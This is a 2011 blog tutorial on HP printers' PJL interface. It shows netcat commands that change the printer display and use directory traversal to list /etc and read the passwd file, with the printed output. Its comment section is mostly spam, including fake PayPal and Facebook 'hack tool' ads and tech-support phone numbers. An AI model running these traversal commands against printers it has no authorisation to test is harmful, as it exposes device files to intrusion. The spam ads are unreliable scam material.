Thursday, December 1, 2011

“Hacking” Printers - PJL Basics

Notice the quotes in the title? That’s because this particular write up is about knowing and understanding the basics. A long time ago, you became a “hacker” because you were someone who was an expert in a subject.
I know people that have forgotten more about VMS than I could ever learn. They became known as a VMS “hacker” because they knew everything that could be known about VMS.
A short while later in my career, I got to be known as the AIX “hacker” because I knew more about AIX than even some IBM techs I’d talk to on the phone. That’s why the term “Hacking” in the title has quotes. What we’re going to talk about today is understanding some very basic features that most people have forgotten about and being able to manipulate those features to help us do some bad stuff.

HP Printer Vulnerability
I’ve been surrounded by a lot of debate, since the HP printer vulnerability controversy sparked up (like the pun?) earlier this week. If you’ve NOT been living with your head buried in the sand the past few days, then you’ve not doubt heard that security researchers have dug into some inherent functionality in HP printers and figured out a way to use it to do some things that could cause some alarm. HP has, since, officially argued that claims about burning printers are sensationalistic.
I’ve been personally dragged into a couple of misguided conversations regarding these new findings and there are a few things that I don’t think have been made crystal clear about the vulnerabilities. With that in mind, I figured we could take a few moments here at Hack On A Dime to refamiliarize ourselves with the basics of HP Printers and focus on what’s at the heart of the new research: PJL.
For those that are not familiar, PJL is very nearly the heart of communication with print queues. But, let’s not get ahead of ourselves.

Printer Communication

Printers are, in essence, simply computers. They communicate via the network, like PC’s, but, unfortunately, they may be the most neglected devices on any network. A sampling of printers tested (later in this article), showed me that they hadn’t had firmware updates in well over a year. (This helped me greatly, because the vulnerability I ended up exploiting was found within that year, so I really shouldn’t complain).
HP Printers have five main ways of communicating on the network, if they’re networked and using JetDirect:

  • HTTP
  • HTTPS
  • Telnet
  • SNMP
  • PCL / PJL
HTTP and HTTPS, is served through what HP calls the Embedded Web Server, or EWS. Now, most administrators, when deploying HP printers, turn off HTTP in favor of HTTPS. Ok, maybe not most, but those that have an understanding about security know that HTTPS is better than HTTP, so they usually turn off communications on Port 80, in favor of Port 443 (HTTPS).

If an admin communicates with their printer through Telnet, the password is usually the same using Telnet, as it is using EWS. SNMP is a whole other discussion (and a whole other vulnerability discussion – did you know you can snmpwalk an HP printer without the community string? Yeah, we’ll talk about THAT later.).

But what’s interesting is PJL – the Printer Job Language – an extension of PCL (the Printer Command Language – how print jobs are communicated to printers) is another way to communicate with the printer and has some … INTERESTING features that help us, the hacker.

PJL, by the way, supports the ability to password protect it (with a separate password from EWS/Telnet) so you can actually protect the printing stream (a little). The following examples, however, were successfully implemented on an HP printer without PJL password being set. But, let’s face facts, nearly 99.9% of the printers out there WILL NOT have the PJL password set.

So, let’s take a look at how we can use PJL to make the printer do some interesting things. NOTE: below, where [ESC] is used, you need to actually insert the ESCAPE character. I highly suggest you use Notepad++ in order to craft the ASCII commands. Regular Notepad just won’t cut it.  And, lastly, you should know that in order to send the commands to the printer, you’re going to use netcat.exe (or nc.exe). This will send the commands in a “raw”, unadulterated way so the printer will interpret the commands correctly.

First, if you want to try something easy out, you can tell the printer to change the “READY” message to something else.

The code to change the “READY” message to “Igor!!!!” do that is:

[ESC]%-12345X @PJL RDYMSG DISPLAY="Igor!!!!"
[ESC]%-12345X

You can paste that code into Notepad++, substitute the [ESC] with the actual Escape character and save the file to a directory. In a Windows environment, you can open a DOS box and issue the “type” command to “echo” the file to netcat. For instance, if you had saved the file as “pjl1.txt”, you can do the following:

type pjl1.txt | nc -v -v <PRINTER IP ADDRESS> 9100

Linux folks can, of course, use “echo” to perform the same thing. Regardless, sending that code to the printer resulted in the printer’s display message reading:



Knowing that the printer accepts PJL code, we can now start to send it way more interesting code. Like what you ask? Well, thanks to a vulnerability associated with PJL code and directory traversal (you know, the practice of inserting periods and slashes into a pathname to traverse the directory structure and get to places you shouldn’t?) we can start to list out the contents of the hard drives that are installed in the printer.

In HP’s world, the main drive is called drive “0:” and the next drive is called drive “1:”. So, for you Windows folks, you have “C:” and the HP printers have “0:”. So, let’s go ahead and list out the “etc” directory.

This code lists out the contents of the ‘etc’ directory for me:

[ESC]%-12345X@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1 COUNT=999999
[ESC]%-12345X

Save this file and “type” it out to netcat.

type pjl-fsdirlist.txt | nc -v -v <IP Address of Printer> 9100

And this was the output of the command:

[Fully Qualified Domain Name] [IP Address] 9100 (?) open
@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1
. TYPE=DIR
.. TYPE=DIR
hp TYPE=DIR
starttab TYPE=FILE SIZE=315
passwd TYPE=FILE SIZE=23
ttys TYPE=FILE SIZE=1357
hosts TYPE=FILE SIZE=159
resolv.conf TYPE=FILE SIZE=53
fsdev TYPE=FILE SIZE=681
fstab TYPE=FILE SIZE=247

Using the PJL commands to interact with the Filesystem is not a hack, it is a feature. However, it is a feature that we can use to view the contents of the hard drives and even the contents of the files. See that “passwd” file up there? Let’s see what’s in it.

This code (the FSUPLOAD command) allowed me to view the contents of the file by sending a print job to the printer.

[ESC]%-12345X@PJL FSUPLOAD NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=22000
[ESC]%-12345X

The output of this command looked like this:

type pjl1.txt | nc -v -v <IP Address of Printer> 9100
Fully Qualified Domain Name [IP Address of Printer] 9100 (?) open
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=23
root::0:0::/:/bin/dlsh

Conclusion
Hopefully, this tutorial helps illustrate for you some basic PJL commands and how to use them to interact with the printers. If you want to learn more about PJL commainds, go ahead and google “PJL reference manual”, you’ll get a number of hits listing out PDF’s containing a ton of PJL commands you can use to mess around with the printers you find on networks you test.

Or, if you decide to really take the quick hacker highway, you can check out this script on attackvector that combines a lot of this stuff together in one Perl script.

Or, if you’re a Metasploit user, you can check out this module that also executes PJL queries.

The key thing to take away from this tutorial is this: the new security research may or may not be 100% accurate, but it should be a launching point for discussion and your expert knowledge in this subject should help you educate others who may not quite understand the claims that are being made regarding the vulnerability of HP Printers.

44 comments:

  1. OFFSET PRINTERS IN INDIA
    Rajhans Enterprises, India’s first leading & largest Offset and Commercial Web Offset Printers in Bangalore State of Karnataka and have branches at Madurai, Coimbatore and Davangere.

    OFFSET PRINTERS
    OFFSET PRINTING
    OFFSET PRINTERS IN INDIA

    For more details visit :- http://rajhansenterprises.com/

    ReplyDelete
  2. Hi
    Kind of fun... I'm also in the middle of hacking a few HP printers.. actually on request to do so...
    Question: Can the FSDIRLIST be disabled in any way ??
    Reason being that although wanting to do just the listing of all the macros.. I do not get any output at all.. nor the listing of the "O:\pcl\macros" that I would like to...
    Any help is appreciated!

    ReplyDelete
    Replies
    1. According to this: http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf there's no discussion regarding disabling the FSDIRLIST command. But enabling passwords for PJL will make it so you can't submit a PJL job with FSDIRLIST and have it execute (without the password). Any jobs submitted without the correct PJL password will look like they are working and then do absolutely nothing. It sounds to me that the target may have PJL passwords enabled. The behavior you describe sounds like it's protected that way.

      Delete
    2. Hi
      COmmand is like this:
      ^[%-12345X@PJL
      @PJL COMMENT XRXbegin
      @PJL COMMENT OID_ATT_START_SHEET OID_VAL_JOB_SHEET_NONE
      @PJL COMMENT OID_ATT_ACCOUNTING_INFORMATION "FMUUSER|042FMUACCOUNT"
      @PJL COMMENT XRXend
      @PJL FSMKDIR NAME="0:\pcl\macros"
      @PJL FSDOWNLOAD FORMAT:BINARY NAME="0:\pcl\macros\15" SIZE=19800
      .....
      ^[%-12345X
      which works well for the download of macros.. but doing a FSDIRLIST on the same directory.... gives no output whatsoever!!
      I am really baffled by this....
      ideas will be appreciated!
      (Needless to say the FSDIRLIST is to make certain that the needed macros have been downloaded and to verify the download)

      Delete
  3. Sre Travels maintains large fleet super deluxe comfortable buses that are well equipped with exotic amenities with various combinations of deals that mostly offer reasonable fares and exclusive services. Bus Ticket for several multiple routes are always possible with Sre Travels. Online Bus Booking for this Travels is available with TicketGoose.com. For discounts and offers visit this page.

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. why not buy my ticket to your funeral for trying to sell tickets...

    ReplyDelete
  6. Here's how you do that one, without downloading anything... Just paste into a command line, replacing "Printer IP" with your printer's IP.

    Note:Type in all caps.

    ----------

    Telnet Printer IP 9100

    @PJL RDYMSG DISPLAY="INSERT COIN"

    ^]

    quit

    ReplyDelete
  7. Do you know a hack for HP printers' region code locking? I have an HP PSC 1300 series lying wasted with me since 4 years because it was purchased in Europe and Indian cartridges don't work on it. I also have 4 brand new colour and black cartridges lying waste which I purchased hurriedly out here. Would really appreciate the help. Thanks in advance!

    ReplyDelete
  8. The offset printers in India are paramount for the promotion and growth of the business organization. You can design customized logos for your business with the aid of offset printing.

    ReplyDelete
  9. This the Good Hacking Techniques.. Thanks For sharing this Information...


    Wedding Websites

    ReplyDelete
  10. So, how do you secure a printer against PJL/Telnet hacks? I set an admin passwd, disabled telnet, and added a PJL password#. Still, I can change the display via telnet. HP P3015.

    ReplyDelete
  11. hi Drew,
    i tried the following command on one of our HP Laserjet printer which i confirmed without pjl password enabled. I did not get any response back and finally i had to use CTRL-C to quit.

    type cplock.pjl | nc -v -v xxx.xxx.xxx.xxx 9100
    where cplock.pjl's content is as follows (i used ALT 027 to insert [esc])
    [ESC]%-12345X@PJL JOB
    @PJL DEFAULT CPLOCK = MINIMUM
    @PJL EOJ
    [ESC]%-12345X

    ReplyDelete
  12. This is Awesome Wonderful information.. i am impressing to Read this post..

    ReplyDelete
  13. Great Technique. Awesome Thanks for sharing this Tips..

    ReplyDelete
  14. This blog is very unique i must appreciate you and i want to ask any body here know about the best Toner Cartridge for Printers if i am using Epson branded printer any unique idea appreciated.

    ReplyDelete
  15. wooooooow i can't believe that..i Bryan L. Knight can hack $72.000 in my paypal account..this is really free money guyz...guyz this is really working...thank you so much for this hacker...is working fine.......thank you
    that is why i am shearing with you.
    Paypal Money Adder
    Paypal Money Generate
    Paypal Money Hack
    Paypal Account Hack

    ReplyDelete

  16. Facebook Hack Tool Free Download
    This is really working...thank you so much for this hacker...is working fine.......thank you
    That is why i am shearing with you.
    facebook hacker download
    facebook password hacker
    download facebook hacker
    facebook account hacker

    ReplyDelete
  17. @Admin

    Can You please guide me how i can install my HP 5000 Printer driver? Where can i download it?

    Regards
    Susane

    ReplyDelete
  18. I am not sure about the idea of hacking a printer on how it helps consumers. All i want it to get cheap printer ink for my every day print usage.

    ReplyDelete
  19. I have been reading your posts regularly. I need to say that you are doing a fantastic job. Please keep up the great work.

    HP Deskjet 3633 Printer Support

    ReplyDelete
  20. Hi... i like your post thank you for sharing and if you face any yahoo mail related issues you can contact yahoo customer care number.

    ReplyDelete
  21. Great blog! I really love how it is easy on my eyes and the information are well written.


    123HPEnvy OfficeJet5745 Setup

    ReplyDelete
  22. Does anybody know if there is another way to send PJL code to a printer without using NetCat? I would like to try to avoid using NetCat as it appears... sketchy. I have tried using the FTP interface already, but no luck. Any help would be greatly appreciated, as I have been trying to resolve this for days!

    Thanks!

    ReplyDelete
  23. I have been reading your posts regularly. I need to say that you are doing a fantastic job. Please keep up the great work.

    123HP officejet-pro 476dw Printer Setup

    ReplyDelete
  24. Nice Post, For HP Support Toll Free Number 0800-098-8579, We provide you online help and support.Call us at Our HP Printer Support Helpline Number

    ReplyDelete

  25. This comment has been removed by a blog administrator


    123 HP envy5642

    ReplyDelete
  26. Very helpful Post!!! This is the first time I have read a post like this. Find Career tips here.

    123 HP LJ M521 Setup - 123.hp.com/lj m521

    ReplyDelete
  27. Thank you for sharing this information and Very good looking blog on

    123 hp oj5745 setup

    ReplyDelete
  28. Get HP printer error solution at one destination just make a call HP Printer Support Helpline Number -1-800-436-0509 , hp printer support in UK, US and AUS 24*7, hp printer setup issues, error solving over the phone.

    ReplyDelete
  29. http://hpprintersupports.blogspot.in/2016/11/how-to-fix-message-error-remove-and.html
    helpline number +1-855-517-2433(TollFree)

    ReplyDelete
  30. Thanks for sharing your valuable tips among us..

    ReplyDelete
  31. contact canon printer support yo get instant solutions for your canon printer - installing printer, driver problem or many other issues which you are facing...

    ReplyDelete
  32. To get hassle-free AT&T email support services from a third party tech support providing company, you need to simply dial at&t toll free customer support number. The phone number is a right choice for getting trouble-free at&t tech support. So you can dial this number and get the needed help for your account-related concerns.att email helpline number

    ReplyDelete
  33. Really awesome blog. Your blog is really useful for me. Thanks for sharing this informative blog. Keep update your blog.


    123 HP Ojp8710

    ReplyDelete
  34. Hi this is very nice post .this is a so important information for everyone .we are providing canon printer technical support for canon product as well as each printers support on toll-free number +1-800-723-4210. Thank you.

    ReplyDelete
  35. very nice blog.thanks for doing this great job and I wish you will continue like this . this is a so important information for everyone .we are providing canon printer technical support for canon product as well as each printers support on toll-free number +1-800-723-4210. Thank you.

    ReplyDelete